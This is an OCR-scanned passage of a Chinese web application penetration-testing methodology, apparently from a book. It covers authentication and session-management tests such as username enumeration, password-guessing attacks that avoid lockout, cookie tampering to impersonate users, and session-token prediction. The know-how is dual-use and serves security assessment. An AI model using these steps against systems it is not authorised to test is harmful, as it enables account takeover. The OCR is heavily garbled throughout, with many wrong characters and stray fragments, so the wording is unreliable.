; | 2143 测 区 用 “|‖ ;| 21.4.6 测 坛 “" 记 [ii| 21.49 测 试 证 | ; ; |21.4.13 第 2 步 测 | ; 
; | 户 名 枚 举 ' ; | 住 我 ”功能 i | 书 的 可 预测 性 “| ，; | 试 多 阶段 处 理 机 制 | ; 


[RON | 
; |21.44 测 试 密码 | ; : E 
;| 猜测 的 适应 性 fi: £ 


和 


21.4.14 HAR 


图 21-5 ”测试 验证 机 制 
21.4.1 验证 


i (1) 确定 应 用 程序 使 用 的 验证 技术 (如 表单 、 证 书 或 多 元 机 

| o 

(2) 确定 所 有 与 验证 有 关 的 功能 (如 登录 、 注 册 、 账 户 恢复 

(3) 如 果 应 用 程序 并 未 采用 自动 自我 注册 机 制 ， 确 定 是 否 可 以 使 
用 任何 其 他 方法 获得 几 个 用 户 账 户 。 


等 ) 


21.4.2 ”测试 密码 强度 


(1) 在 应 用 程序 中 查找 有 关 用 户 密码 最 小 强度 规则 的 说 明 。 

(2) 尝试 使 用 所 有 自我 注册 或 密码 修改 功能 ， 设 定 各 种 脆弱 密 
码 ， 确 定 应 用 程序 实际 应 用 的 密码 强度 规则 。 符 试 使 用 短 密码 、 仅 包 
含 字母 字符 的 密码 、 全 部 大 写 或 全 部 小 写字 符 的 密码 、 单 词 型 密码 以 
及 将 当前 用 户 名 作为 密码 。 

(3) 测试 不 完整 的 证 书 确认 。 设 定 一 个 强大 并 且 复 杂 的 密码 A 
如 ， 蜜 码 长 度 为 12 个 字符 ， 其 中 包含 大 小 写字 母 、 数 字 和 印刷 字 
符 ) 。 沦 试用 这 个 密码 的 各 种 变化 形式 登录 ， 如 删除 最 后 一 个 字符 ， 
改变 字符 的 大 小 写 ， 或 者 删除 任何 特殊 字符 。 如 果 其 中 一 些 沦 试 取得 
成 功 ， 继 续 系 统 性 地 符 试 ， 了 解 完整 的 证 书 确 认 过 程 。 

(4) 了 解 最 小 密码 强度 规则 以 及 密码 确认 的 程度 后 ， 再 设法 确定 
密码 猜测 攻击 所 需要 使 用 的 密码 值 范围 ， 以 提高 攻击 成 功 的 可 能 性 。 
壬 试 找 出 所 有 的 内 置 账户 ， 它 们 可 能 并 不 满足 标准 密码 复杂 度 要 求 。 


21.4.3 ”测试 用 户 名 枚 举 


(1) 确定 各 种 验证 功能 通过 在 屏幕 上 显示 的 输入 字段 、 隐 藏 表单 
字段 或 cookie 提 交 用 户 名 的 每 一 个 位 置 。 这 些 位 置 通常 存在 于 登录 、 
目 我 注册 、 密码 修 改 、 退 出 与 账户 恢复 功能 中 。 

(2) 回 每 个 位 置 提交 两 个 请 求 ， 其 中 分 别 包含 一 个 有 效 和 一 个 无 
效 的 用 户 名 。 分 析 服 务 絮 对 每 一 个 请 求 的 啊 应 的 各 方面 细 方 ， 包 括 
HTTP 状 态 码 、 任 何 重 定 辣 、 屏 人 梨 上 显示 的 信息 、 任 何 隐 着 在 HTML 页 
面 源 代码 中 的 差异 以 及 服务 器 做 出 啊 应 的 时 间 。 请 注意 ， 其 中 一 些 差 
异 可 能 极其 细微 (例如 ， 看 似 相 同 的 错误 消息 可 能 包含 排版 方面 的 细 
小 差异 ) 。 可 以 使 用 拦截 代理 服务 絮 的 “历史 记录 ”功能 分 析 进 出 服务 
右 的 所 有 流量 。WebScarab 的 一 项 功能 可 对 两 个 啊 应 进行 比较 ， 以 迅速 
确定 它们 之 间 的 任何 差异 。 

(3) 如 果 从 提交 有 效 和 无 效用 户 名 返回 的 响应 中 发 现任 何 差异 ， 
那么 使 用 另外 一 组 用 户 名 重复 进行 测试 ， 确 定 啊 应 之 间 是 否 存 在 相同 
模式 的 差异 ， 以 此 作为 目 动 化 用 户 名 枚 举 的 基础 。 

(4) 检查 应 用 程序 中 任何 其 他 可 帮助 获得 一 组 有 效用 户 名 的 信息 
漆 露 源 ， 例 如 ， 日 志 功 能 、 注 册 用 户 列表 以 及 在 源 代码 注释 中 直接 提 
及 姓名 或 电子 邮件 地 址 的 情况 。 


(5) 定位 任何 接受 用 户 名 的 附属 验证 机 制 ， 并 确定 是 否 可 以 将 其 
用 于 用 户 名 枚 举 。 特 别 注意 允许 指定 用 户 名 的 注册 页 面 。 


21.4.4 测试 密码 猜测 的 适应 性 


(1) 确定 应 用 程序 提交 用 户 证 书 的 每 一 个 位 置 。 通 常 ， 用 户主 要 
在 主 登 孙 功能 和 密码 修改 功能 中 提交 证 书 。 如 采用 户 可 提交 任意 用 户 
和 名， 密码 修改 功能 才 会 成 为 密码 猜测 攻击 的 有 效 目 标 。 

(2) 在 每 一 个 位 置 ， 使 用 一 个 受 控制 的 账户 手动 提出 几 个 包含 有 
效用 户 名 但 证 书 无 效 的 请 求 。 监 控 应 用 程序 的 啊 应 ， 确 定 它们 之 间 的 
所 有 差异 。 如 果 应 用 程序 经 过 大 约 10 次 登录 失败 后 还 没有 返回 任何 有 
天 账户 锁定 的 消 妃 ， 再 提交 一 个 包含 有 效 证 书 的 请 求 。 如 果 这 个 请 求 
登录 成 功 ， 应 用 程序 可 能 并 未 采用 任何 账户 锁定 策略 。 

(3) 如 果 没 有 控制 任何 账户 ， 那 么 尝试 枚 举 或 猜测 一 个 有 效 的 用 
户 名 ， 并 使 用 它 提交 几 个 无 效 的 请 求 ， 监 控 任 何 有 关 账 户 锁定 的 错误 
消 思 。 当 然 ， 应 该 意识 到 ， 这 种 测试 可 能 会 导致 其 他 用 户 的 账户 被 冻 
结 或 禁用 。 


21.4.5 ”测试 账户 恢复 功能 


(1) 确定 如 果 用 户 息 记 他 们 的 证 书 ， 应 用 程序 是 否 允 许 他 们 重新 
控制 利己 的 账户 。 通 第 ， 在 主 登 录 功 能 附近 有 一 个 “起 记 和 密码” 链接 即 
表示 应 用 程序 采用 了 密码 恢复 功能 。 

(2) 使 用 一 个 受 控制 的 账户 完成 整个 密码 恢复 过 程 ， 了 解 账户 恢 
复 功 能 的 运作 机 制 。 

(3) 如 果 该 功能 使 用 机 密 问 题 之 类 的 质询 ， 确 定 用 户 是 否 可 以 在 
注册 时 设 定 或 选择 他 们 目 己 的 质询 。 如 果 可 以 ， 使 用 一 组 枚 举 出 的 或 
常见 的 用 户 名 获取 一 组 质询 ， 并 对 其 进行 分 析 ， 找 出 任何 很 容易 猜测 
出 答案 的 质询 。 

(4) 如 有 果 该 功能 使 用 密码 “暗示 ”， 采 取 和 上 个 步骤 相同 的 操作 获 
得 一 组 密码 暗示 ， 确 定 任何 可 轻易 猜测 出 答案 的 暗示。 

(5) 对 账户 恢复 质询 进行 与 主 登 录 功 能 相同 的 测试 ， 确 定 可 对 其 
实施 目 动 猜 测 攻 击 的 漏洞 。 

(6) 如 果 该 功能 要 求 向 用 户 发 送 一 封 电子 邮件 才能 完成 整个 恢复 
过 程 ， 寻 找 任 何 可 帮助 控制 其 他 用 户 账 户 的 弱点 。 确 定 是 否 有 可 能 控 
制 接收 以 上 电子 邮件 的 地 址 。 如 采 邮 件 内 容 中 包含 一 个 唯一 的 恢复 


URL， 使 用 受 控 制 的 一 个 电子 邮件 地 址 获得 若干 邮件 ， 壬 试 确定 任何 
可 帮助 预测 发 布 给 其 他 用 户 的 URL 模 式 。 应 用 21.5.3 慷 描述 的 方法 确定 
所 有 可 预测 的 序列 。 


21.4.6 测试“ 记 住 我 ”功能 


(1) 如 果 主 登录 功能 或 它 的 支持 逻辑 包含 “ 记 住 我 ”功能 ， 激 活 这 
项 功能 并 分 析 它 的 作用 。 如 采 该 功能 允许 用 户 随 后 不 输入 任何 证 书 即 
可 登录 ， 那 么 应 该 仔细 分 析 这 项 功能 ， 查 找 其 中 存在 的 所 有 漏洞 。 

(2) 仔细 检查 激活 “ 记 住 我 ?功能 时 设 定 的 所 有 持久 性 cookie。 寻 
找 任 何 明 确 标识 出 用 户 喘 份 或 明显 包含 可 预测 的 用 户 标识 符 的 数据 。 

(3) 即使 其 中 保存 的 数据 经 过 严密 编码 或 模糊 处 理 ， 也 要 仔细 分 
析 这 些 数据 ， 并 比较 “ 记 住 ? 几 个 非常 类 似 的 用 户 名 和 密码 的 结果 ， 找 
到 任何 可 对 原始 数据 进行 刻 回 工程 的 机 会 。 应 用 21.5.2 节 描述 的 方法 确 
定 所 有 有 用 的 数据 。 

(4) 根据 以 上 结果 ， 适 当 修改 cookie 的 内 容 ， 尝 试 伪装 成 其 他 应 
用 程序 用 户 。 


21.4.7 _ 测试 伪装 功能 


(1) 如 果 应 用 程序 包含 任何 明确 的 功能 ， 人 允许 一 名 用 户 伪装 成 男 
一 名 用 户 ， 那 么 仔细 审查 这 项 功能 ， 查 找 所 有 人 允许 未 经 正确 授权 即 可 
盆 流 成 任意 用 户 的 漏洞 。 

(2) 寻找 所 有 用 户 提交 的 、 用 于 确定 伪装 目标 的 数据 。 淮 试 修改 
这 个 数据 ， 伪 朔 成 其 他 用 户 ， 符 别 是 可 帮助 提升 权限 的 管理 用 户 。 

(3) 当 针 对 其 他 用 户 账户 实施 自动 密码 猜测 攻击 时 ， 寻 找 所 有 了 明 
显 使 用 多 个 有 效 密 码 的 账户 ， 或 者 儿 个 使 用 相同 密码 的 账户 。 这 表示 
应 用 程序 提供 后 门 密 码 ， 以 便 管理 员 使 用 它 时 以 任何 用 户 的 身份 访问 
应 用 程序 。 


21.4.8 ”测试 用 户 名 唯一 性 


(1) 如 果 应 用 程序 提供 自我 注册 功能 ， 人 允许 指定 想 要 的 用 户 名 ， 
那么 尝试 使 用 不 同 的 密码 注册 同一 个 用 户 名 。 

(2) 如 果 应 用 程序 阻止 第 二 个 注册 演 试 ， 就 可 以 利用 这 种 行为 枚 
举国 注册 用 户 名 * 


(3) 如 果 应 用 程序 注册 以 上 两 个 账户 ， 深 入 分 析 这 种 情况 ， 确 定 
用 户 名 与 密码 发 生 冲 突 时 应 用 程序 的 行为 。 笑 试 修改 一 个 账户 的 密 
码 ， 使 其 与 男 一 个 密码 相同 。 同 时 ， 壬 试 使 用 完全 相同 的 用 尸 名 与 密 
码 注册 两 个 账户 。 

(4) 如 果 在 用 户 名 与 密码 发 生 神 突 时 ， 应 用 程序 发 出 警报 或 产生 
一 个 错误 ， 束 可 以 利用 这 种 行为 实施 目 动 化 猜测 攻击 ， 确 定 其 他 用 户 
的 密码 。 针 对 一 个 枚 举 出 的 或 猜测 到 的 用 户 名 ， 壬 试 使 用 这 个 用 户 名 
与 不 同 的 密码 创建 账户 。 应 用 程序 拒绝 某 个 特殊 的 密码 即 表 示 它 可 能 
是 目 标 账户 的 现 有 密码 。 

(5) 如 果 应 用 程序 接受 相互 冲突 的 用 户 名 与 密码 ， 并 且 不 产生 错 
误 ， 那 么 使 用 相互 冲突 的 证 书 登 水， 确定 应 用 程序 的 行为 ， 以 及 是 否 
可 以 利用 这 种 行为 不 经 授权 即 可 访问 其 他 用 户 的 账户 。 


21.4.9 ”测试 证 书 的 可 预测 性 


(1) 如 果 用 户 名 或 密码 由 应 用 程序 自动 生成 ， 设 法 获得 几 个 紧密 
相连 的 用 户 名 或 密码 ， 确 定 任何 可 探测 的 顺序 或 模式 。 

(2) 如 果 用 户 名 以 可 预测 的 方式 生成 ， 那 么 向 后 推导 ， 获 得 一 组 
可 能 有 效 的 用 户 名 。 这 些 用 户 名 可 作为 目 动 密码 猜测 与 其 他 攻击 的 基 


fill ° 

(3) 如 果 密 码 以 可 预测 的 方式 生成 ， 那 么 推导 这 种 模式 ， 获 取 应 
用 程序 疝 其 他 用 户 发 布 的 一 组 密码 。 渗 透 测 试 员 可 以 将 这 些 密码 与 获 
得 的 用 户 名 进行 组 合 ， 实 施 密码 猜测 攻击 。 


21.4.10 ”检测 不 安全 的 证 书 


(1) 遍历 所 有 需要 传输 证 书 、 与 验证 有 关 的 功能 ， 包 括 主 登录 功 
能 、 账 户 注册 功能 、 密 码 修改 功能 以 及 人 允许 查看 或 更 新 用 户 个 人 信息 
的 页 面 。 使 用 拦截 代理 服务 絮 监 控 客 户 端 与 服务 絮 之 间 的 所 有 流量 。 

(2) 确定 在 来 回 方向 传输 证 书 的 每 一 种 情况 。 可 以 在 拦截 代理 服 
务 絮 中 设置 拦截 规则 ， 标 记 包 含 特殊 字符 串 的 消 轧 。 

(3) 如果 证 书 在 URL 查 询 字 符 串 中 传输 ， 那 么 这 些 证 书 可 能 会 通 
过 浏览 器 历史 记录 、 屏 幕 、 服 务 器 日 志 以 及 Referer 消 息 涉 (如 果 访 问 
第 三 方 链接 ) YEE o 

(4) 如 果 证 书 被 保存 在 cookie 中 ， 可 能 会 通过 XSS 攻 击 或 本 地 隐 
私 攻击 泄露 。 


(5) 如 果 证 书 被 从 服务 器 传送 回 客户 端 ， 攻 击 者 就 可 以 利用 会 话 
管理 或 访问 控制 漏洞 ， 或 者 通过 XSS 攻 击 获取 这 些 证 书 。 

(6) 如 果 证 书 通 过 未 加 密 连接 传送 ， 它 们 很 可 能 被 窃听 者 拦截 。 

(7) 如 果 使 用 HTTPS 提 交 证 书 ， 但 使 用 HTTP 加 载 登录 表单 ， 那 
么 应 用 程序 就 容易 遭受 中 间 人 的 攻击 ， 攻 击 者 也 可 能 使 用 这 种 攻击 手 
段 获取 证 书 。 


21.4.11 检测 不 安全 的 证 书 分 配 


(1) 如 果 应 用 程序 通过 某 种 带 外 通道 创建 账户 ， 或 者 它 提供 的 自 
我 注册 功能 本 映 并 不 决定 用 户 使 用 的 全 部 初始 证 书 ， 那 么 应 该 确定 应 
用 程序 采用 什么 方法 同 新 用 户 分 配 证 书 。 第 用 的 方法 包括 发 送 电 子 邮 
件 ， 或 者 同 邮政 地 址 寄 送 信件 。 

(2) 如 果 应 用 程序 生成 以 种 外 方式 分 配 的 账户 激活 URL， 尝 试 注 
及 几 个 紧密 相连 的 新 账户 ， 并 确定 收 到 的 URL 中 的 顺序 。 如 果 能 确定 
某 种 模式 ， 努 力 预 测 应 用 程序 发 送 给 最 近 与 后 续 用 户 的 URL， 并 党 试 
使 用 这 些 URL 占 有 他 们 的 账户 。 

(3) 尝试 多 次 重复 使 用 同一 个 激活 URL， 看 看 应 用 程序 是 否 允 许 
这 样 做 。 如 有 果 遭 到 拒绝 ， 壬 试 在 重复 使 用 URL 之 前 锁定 目标 账户 ， 看 
看 URL 是 人 否 仍然 可 用 。 确 定 使 用 这 种 方法 是 否 可 以 给 一 个 已 经 激活 的 
账户 设 定 一 个 新 密码 。 


21.4.12 ”测试 不 安全 的 存储 


(1) 如 果 可 以 访问 散 列 密码 ， 应 检查 共享 同一 散 列 密码 值 的 账 
尸 。 壬 试 以 采用 最 第 用 的 散 列 值 的 密码 登录 。 
(2) 使 用 相关 散 列 算法 的 离线 彩虹 表 查 找 明文 值 。 


21.4.13 ”测试 逻辑 缺陷 


1. 测试 故障 开放 条 件 

(1) 对 于 要 求 应 用 程序 检查 用 户 证 书 的 每 一 项 功能 (包括 登录 与 
密码 修改 功能 ) ， 使 用 受 控制 的 账户 以 正常 方式 访问 这 些 功能 。 注 意 
它们 提交 给 应 用 程序 的 每 一 个 请 求 参 数 。 

(2) 连续 多 次 重复 以 上 过 程 ， 以 各 种 无 法 预料 的 方式 轮流 修改 每 
一 个 参数 ， 破 坏 应 用 程序 的 逻辑 。 对 每 一 个 参数 进行 以 下 修改 。 


口 提 区 一 个 空 字符 串 值 。 
口 完 全 删除 名 / 值 对 。 
口 提交 非常 长 和 非常 短 的 值 。 
口 提 交 字 符 串 代替 数 子 或 提交 数字 代替 字符 串 。 
口 以 相同 和 不 同 的 值 ， 多 次 提交 同一 个 命名 参数 。 
(3) 仔细 检查 应 用 程序 对 上 述 请 求 的 响应。 如 果 出 现任 何 无 法 预 
料 的 侄 异 ， 对 这 个 结 末 进行 进一步 测试 。 如 果 茶 个 修改 造成 行为 改 
0 a a a 
| 其 限制 。 
2. 测试 多 阶段 处 理 机 制 
(1) 如 果 任 何 与 验证 有 关 的 功能 需要 在 一 系列 不 同 的 请 求 中 提交 
证 书 ， 确 定 每 个 阶段 的 主要 目的 ， 同 时 注意 每 个 阶段 提交 的 参数 。 
(2) 连续 多 次 重复 以 上 过 程 ， 修 改 提 交 请 求 的 顺序 ， 破 坏 应 用 程 
序 的 逻辑 。 相 关 测 试 包括 : 
O 以 不 同 的 顺序 完成 所 有 阶段 ， 到 达 想 要 的 那个 阶段 ; 
OD 轮流 直 接 进入 每 一 个 阶段 ， 然 后 按 正 常 的 顺序 访问 后 续 步 


TR 
口 儿 次 访问 上 述 功 能 ， 轮 流 省 略 每 一 个 阶段 ， 然 后 在 后 一 个 

阶段 继续 按 正 常 的 顺序 访问 ; 

口 根据 观察 到 的 结果 及 每 个 功能 阶段 的 主要 目的 ， 笑 试 通过 
Fe ee eee eee 
阶段 。 

(3) 确定 是 否 有 任何 一 项 信息 (如 用 户 名 ) 在 儿 个 阶段 被 提交 ， 

或 者 是 因为 用 户 提 交 了 它 儿 次 ， 或 者 是 因为 它 通 过 客户 端 在 隐 藏 表单 

字段 、cookie 或 预 移 设 置 的 查询 字符 串 参 数 中 传送 。 如 果 是 这 样 ， 演 

试 在 不 同 的 阶段 提交 不 同 的 值 (包括 有 效 和 无 效 的 值 ) ， 并 观察 其 后 

果 。 设 法 确定 提交 的 数据 是 否 是 多 余 的 ， 或 者 在 一 个 阶段 确认 ， 随 后 

即 被 应 用 程序 信任 ， 或 者 在 不 同 的 阶段 通过 不 同 的 检查 进行 确认 。 洽 

人 
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(4) 寻找 所 有 通过 客户 端 传送 的 数据 。 如 果 应 用 程序 使 用 隐藏 参 

数 在 各 个 功能 阶段 中 追 踩 进程 的 状态 ， 那 么 攻击 者 束 可 以 修改 这 些 参 

数 ， 从 而 破坏 应 用 程序 的 逻辑 。 

(5) 如果 进 程 的 任何 部 分 要 求 应 用 程序 采用 一 个 随机 变化 的 质 

询 ， 对 它 进 行 测试 ， 碍 找 以 下 两 种 常见 的 缺陷 。 


口 如 采 一 个 指定 质询 的 参数 与 用 户 的 啊 应 一 起 提交 ， 确 定 十 
否 可 以 修改 这 个 值 ， 选 择 目 己 的 质询 。 

口 多 次 使 用 相同 的 用 户 名 处 理 上 述 不 断 变 化 的 质询 ， 确 定 每 
次 是否 出 现 一 个 不 同 的 质询 。 如 采 每 次 的 质询 各 不 相同 ， 那 么 束 
可 以 重复 进入 这 个 阶段 ， 直 到 应 用 程序 显示 硕 望 的 质询 ， 以 这 种 
方式 选择 想 要 的 质询 。 


21.4.14 ”利用 漏洞 获取 未 授权 访问 


(1) 分 析 在 各 种 验证 功能 中 发 现 的 所 有 漏洞 ， 确 定 所 有 可 在 攻击 
应 用 程序 过 程 中 用 于 实现 目 己 的 目标 的 漏洞 。 通 常 ， 这 包括 笑 试 以 男 
一 名 用 户 的 吴 份 进行 验证 ;如 有 可 能 ， 以 拥有 管理 权限 的 用 户 吴 份 验 
证 。 


(2) 在 实施 自动 攻击 之 前 ， 留 意 已 经 确定 的 所 有 账户 锁定 防御 。 
例如 ， 当 对 登录 功能 实施 用 户 名 枚 举 攻 击 时 ， 在 请 求 中 提交 一 个 第 用 
的 而 不 能 完全 随机 的 密码 ， 以 免 在 每 一 个 发 现 的 用 户 名 上 痕 费 一 次 登 
录 失 败 壬 试 。 同 样 ， 应 以 广度 优先 而 非 深 度 优先 的 方式 实施 密码 猜测 
攻击 。 首 移 使 用 单词 列表 中 最 芝 用 的 脆弱 密码 ， 然 后 使 用 其 他 值 ， 对 
每 一 个 枚 举 出 的 用 户 名 实施 密码 猜测 攻击 。 

(3) 构建 在 密码 猜测 攻击 中 使 用 的 单词 列表 时 ， 应 考虑 密码 强度 
码 值 。 

(4) 使 用 第 14 章 描述 的 技巧 实施 尽 可 能 多 的 上 自动 攻击 ， 提 高 攻击 
的 速度 与 效率 。 


21.5 试 会 话 管理 


21.5.1 了 解 会 话 管理 机 制 
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21.5.10 检查 cookie 范围 


Socwetescsseeaseeswecneeseed linc ce eee nse Sees eee eo ess see sceoeus boos 


21.5.1 ”了解 会 话 管理 


(1) 分 析 应 用 程序 用 于 管理 会 话 与 状态 的 机 制 。 确 定 应 用 程序 是 
人 否 使 用 会 话 令 牌 或 其 他 方法 处 理 每 一 名 用 户 提 区 的 各 种 请 求 。 请 注 
意 ， 用 户 通过 验证 后 ， 一 些 验证 技术 (如 HTTP 验 证 ， 并 不 需要 使 用 完 
整 的 会 话机 制 重新 确认 用 户 的 喘 份 。 同 时 ， 一 些 应 用 程序 采用 一 种 无 
会 话 状态 机 制 ， 通 常 使 用 一 个 加 密 或 模糊 处 理 的 表单 ， 通 过 窗户 端 伟 
送 所 有 状态 信息 。 

(2) 如 果 应 用 程序 使 用 会 话 令 牌 ， 确 定 它 到 底 使 用 哪些 数据 重新 
确认 用 户 的 身份 。HTTP cookie、 查 询 字 符 串 参数 以 及 隐藏 表单 字段 均 


可 用 于 传送 令 牌 。 可 使 用 不 同 的 数据 共同 重新 确认 用 户 的 喘 份 ， 不 同 
的 数据 可 能 被 不 同 的 后 端 组 件 使 用 。 有 了 时， 看 似 为 会 话 令 牌 的 数据 实 
际 并 未 被 应 用 程序 使 用 ， 例 如 ，Web 服 务 絮 生成 的 默认 cookie 。 

(3) 为 确定 应 用 程序 到 底 使 用 哪些 数据 作为 令 牌 ， 找 到 一 个 确信 
依赖 会 话 的 页 面 《如 某 一 名 用 户 的 “用 户 资 料 ” 页 面 ) Boe, FE 
提出 几 个 请 求 ， 系 统 性 地 删除 怀疑 被 用 作 令 牌 的 数据 项 。 如 果 删 除 某 
个 数据 项 后 ， 应 用 程序 不 再 返回 依赖 会 话 的 页 面 ， 即 可 确定 该 数据 项 
为 会 话 令 牌 。Burp Repeater 是 执行 这 些 测试 的 有 用 工具 。 

(4) 确定 应 用 程序 使 用 哪些 数据 重新 确认 用 户 的 身份 后 ， 人 确定 它 
是 否 对 每 个 令 牌 进行 完整 的 确认 ， 或 者 是 否 忽略 令 脾 的 某 些 组 成 部 
分 。 人 和 修改 令 牌 的 值 ， 一 次 修改 一 字 和 ， 并 确定 修改 后 的 值 是 否 仍然 被 
应 用 程序 接受 。 如 果 发 现 令 牌 的 某 些 部 分 并 未 被 用 于 保持 会 话 的 状 
态 ， 束 不 必 再 深入 分 析 它 们 。 


21.5.2 ”测试 令 牌 的 含义 


(1) 在 不 同时 间 以 几 个 不 同 的 用 户 登 录 ， 记 录 上 服务器 发 布 的 令 
脾 。 如 果 应 用 程序 允许 自我 注册 ， 就 可 以 选择 自己 的 用 户 名 ， 用 一 系 
列 存在 细微 差别 的 相似 用 户 名 登录 ， 如 A、AA、AAA、AAAA、 
AAAB、AAAC、AABA 等 。 如 果 其 他 与 某 一 名 用 户 有 关 的 数据 (如 电 
子 邮 件 地 址 ) 在 登录 阶段 提交 或 保存 在 用 户 资 料 中 ， 对 其 进行 与 前 面 
类 似 的 系统 化 修改 ， 并 截获 收 到 的 令 脾 。 

(2) 分 析 收 到 的 令 牌 ， 查 找 所 有 与 用 户 名 和 其 他 用 户 可 控制 的 数 
据 有 关 的 内 容 。 

(3) 分 析 令 牌 ， 查 找 所 有 了 明显 的 编码 或 模糊 处 理 方 案 。 查 找 用 户 
名 长 度 与 令 牌 长 度 之 间 的 所 有 相互 关系 ; 这 种 关系 表示 应 用 程序 明显 
使 用 了 某 种 模糊 处 理 或 编码 方案 。 如 果 用 户 名 包含 一 组 相同 的 字符 ， 
在 令 脾 中 寻找 表示 可 能 使 用 XOR 模 糊 处 理 的 对 应 字符 序列 ; 在 令 牌 中 
寻找 仅 包 含 十 六 进 制 字 符 的 序列 ， 它 表示 应 用 程序 可 能 对 ASCII 字 符 
串 进行 了 十 六 进 制 编码 处 理 ， 或 者 披露 其 他 信息 。 寻 找 以 等 号 (=) 
结尾 的 字符 序列 或 仅 包 含 其 他 有 效 Base64 字 符 的 序列 ， 如 ar-z、A-Z、 
0-9、+ 和 /。 

(4) 如 果 可 以 从 会 话 令 牌 样本 中 获得 任何 有 意义 的 数据 ， 人 确定 这 
些 信息 是 否 足 以 帮助 发 动 攻击 ， 猜 测 出 最 近 发 布 给 其 他 应 用 程序 用 户 
的 令 牌 。 找 到 一 个 依赖 会 话 的 应 用 程序 页 面 ， 使 用 第 14 章 描述 的 技巧 
自动 生成 和 测试 可 能 的 令 牌 。 


21.5.3 ”测试 令 牌 的 可 预测 性 


(1) 使 用 一 个 可 使 服务 器 返回 一 个 新 令 牌 的 请 求 (例如 一 个 成 功 
登录 请 求 ; ， 生 成 并 截获 大 量 紧密 相连 的 会 话 令 牌 。 

(2) 设法 确定 令 牌 样本 中 的 所 有 模式 。 在 所 有 情况 下 ， 都 应 使 用 
Burp Sequtncer 对 应 用 程序 令 牌 的 随机 特性 进行 详细 的 统计 测试 ， 如 第 
7 章 所 述 。 然 而 ， 根 据 目 动 扫 拉 结果， 仍然 需要 进行 一 些 手 动 分 析 。 

口 理解 应 用 程序 重 狐 确 认 用 户 和 号 份 的 令 牧 和 子 序列。 名 上 略 并 
ee ee 即使 样本 中 的 这 些 数据 发 生 了 
IE © 

口 如 果 不 清楚 令 牌 或 者 令 牌 的 所 有 组 成 成 分 使 用 何 种 类 型 的 

数据 ， 尝 试 使 用 各 种 解码 方法 (例如 Base64) ， 看 能 否 得 到 更 有 

意义 的 数据 。 有 时 可 能 有 必要 连续 使 用 几 种 解码 方法 。 

口 设 法 确定 解码 后 的 令 牌 或 组 成 成 分 数据 中 存在 的 所 有 模 

式 。 计 算 连 续 值 之 间 的 差距 。 即 使 这 些 值 看 似 杂 乱 无 草 ， 但 是 它 

们 之 间 仍 然 可 能 存在 固定 的 差距 ， 人 允许 渗透 测试 员 显 著 缩小 粟 力 

攻击 的 范围 。 

口 等待 几 分 钟 后 ， 截 取 类 似 的 一 组 令 牌 样本 ， 重 复 进行 上 壕 

分 析 。 设 法 确定 令 牌 的 内 容 是 否 具 有 时 间 依 赖 性 。 

(3) 如 果 已 经 确定 了 所 有 模式 ， 使 用 一 个 不 同 的 IP 地 址 与 用 户 名 
截获 另 一 组 令 牌 样本 ， 确 定 是 否 可 以 探查 到 相同 的 模式 ， 或 者 是 否 可 
以 对 第 一 组 令 牌 进行 推导 ， 猜 测 出 第 二 组 令 牌 。 

(4) 如 果 能 够 确定 可 利用 的 序列 或 时 间 依 赖 关 系 ， 考 虑 这 些 信息 
是 否 足以 帮助 发 动 攻击 ， 猜 测 出 最 近 发 布 给 其 他 应 用 程序 用 户 的 令 
牌 。 使 用 第 14 章 描述 的 技巧 目 动 生 成 和 测试 可 能 的 令 牌 。 除 最 简单 的 
序列 外 ， 可 能 需要 在 攻击 中 使 用 某 些 定制 脚本 。 

(5) 如 果 会 话 ID 似乎 是 定制 编写 的 ， 可 以 使 用 Burp Intruder 中 
的 “位 翻转 有效 载 集 源 继续 轮流 修改 会 话 令 牌 中 的 每 个 位 。 同 时 ， 在 
啊 应 中 查找 表明 修改 令 牌 是 否 会 导致 会 话 无 效 ， 或 会 话 是 否 属于 其 他 
用 户 的 字符 串 。 


21.5.4_ 检 查 不 安全 的 令 牌 传输 


(1) 以 正常 方式 访问 应 用 程序 ， 从 “起 始 ”URL 中 的 未 通过 验证 的 
内 容 开 始 ， 到 登录 过 程 ， 再 到 应 用 程序 的 全 部 功能 。 留 意 发 布 新 会 话 


令 牌 的 每 一 种 情况 ， 确 定 哪 些 部 分 使 用 HTTP 通 信 ， 哪 些 部 分 使 用 
HTTPS 通 信 。 可 以 使 用 拦截 代理 器 的 日 志 功能 记录 这 些 信 息 。 

(2) 如 果 应 用 程序 使 用 HTTP cookie 传 送 会 话 令 牌 ， 应 确认 其 是 
否 设置 了 安全 标记 ， 防 止 通过 HTTP 连 接 传 送 令 牌 。 

(3) 在 正常 使 用 应 用 程序 的 情况 下 ， 确 定 会 话 令 牌 是 否 通过 
HTTP 连 接 传送 。 如 果 是 这 样 ， 它 们 就 很 容易 被 拦截 。 

(4) 如 果 应 用 程序 在 未 通过 验证 的 区 域 使 用 HTTP， 然 后 在 登录 
或 通过 验证 的 区 域 转换 到 HTTPS， 那 么 确认 应 用 程序 是 否 为 HTTPS 通 
信 发 布 一 个 新 的 令 牌 ， 或 者 应 用 程序 在 转换 到 HTTPS 后 是 否 仍然 使 用 
HTTP 阶 段 的 令 牌 。 如 果 是 这 样 ， 它 们 就 很 容易 被 拦截 。 

(5) 如 果 应 用 程序 的 HTTPS 区 域 包含 指向 HTTP URL 的 链接 ， 访 
问 这 些 链 接 ， 确 认 在 访问 过 程 中 是 否 有 会 话 令 牌 被 提交 ; 如 果 是 这 
样 ， 该 令 牌 或 者 继续 有 效 ， 或 者 立即 被 服务 器 终止 。 


21.5.5 “检查 在 日 志 中 泄露 的 令 牌 


(1) 如 果 在 应 用 程序 解析 过 程 中 能 确定 任何 日 志 、 监 控 或 诊断 功 
能 ， 应 仔细 检查 这 些 功 能 ， 确 定 它 们 是 否 泄 露 任何 会 话 令 牌 。 确 定 在 
正常 情况 下 哪些 人 有 权 访 问 这 些 功能 ， 如 有 果 只 有 管理 员 能 够 使 用 这 些 
劝 能， 那么 确认 低 权 限 用 户 是 否 可 以 利用 任何 其 他 漏洞 访问 它们 。 

(2) 确定 所 有 在 URL 中 传送 会 话 令 牌 的 情况 。 可 能 应 用 程序 通常 
以 更 加 安全 的 方式 传送 令 牌 ， 而 开发 者 在 特定 情况 下 使 用 URL 来 解决 
特殊 难题 。 如 有 果 是 这 样 ， 当 用 户 访问 站 外 链接 时 ， 这 些 令 牌 将 在 
Referer 消 息 头 中 传送 。 确 定 所 有 允许 在 其 他 用 户 可 查看 的 页 面 中 插入 
任意 站 外 链接 的 功能 。 

(3) 如 果 能 够 收集 到 发 布 给 其 他 用 户 的 有 效 会 话 令 牌 ， 就 对 每 个 
令 牌 进行 测试 ， 确 定 它 是 否 属于 管理 用 户 〈 例 如 ， 党 试 使 用 令 牌 访问 
